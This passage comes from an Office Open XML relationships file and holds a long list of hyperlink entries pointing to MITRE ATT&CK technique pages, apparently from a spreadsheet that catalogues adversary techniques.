Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1528" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/003" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/002" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/004" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/008" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/013" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/004" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/003" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/006" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1525" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/001" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1007" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1119" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/002" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/002" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/006" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/002" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/011" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/003" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/004" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/003" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/001" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/008" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/005" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/014" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/010" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/002" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/001" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/001" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/004" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/002" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/001" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/004" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/001" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/004" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/002" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/007" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/006" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/002" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/008" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/001" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/001" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/002" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/002" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/001" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/002" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/006" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/003" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/008" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/001" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/003" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020/001" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/003" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/002" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/001" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/002" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/007" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1140" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/015" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/002" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/002" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1620" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/006" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/001" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/005" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1485" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/004" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/001" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/004" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1495" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/002" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/006" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/004" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518/001" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/001" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/003" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/001" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/006" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/002" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/001" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1115" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/013" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/001" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/007" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/005" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/005" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/001" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/004" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/003" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/002" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/001" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/004" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/004" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/002" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/001" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1489" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1529" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/004" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/001" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/005" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1211" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/003" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/008" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/002" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/001" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1217" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/001" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/003" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/002" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/001" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/005" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/004" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/004" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1538" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1135" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/002" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614/001" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/003" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/001" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/005" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/003" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1572" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/006" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/001" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/002" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/001" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/002" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/002" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1570" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/007" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/005" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1080" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/001" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/003" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/003" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011/001" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/001" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/003" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/004" TargetMode="External"/><Relationship Id="rId64" 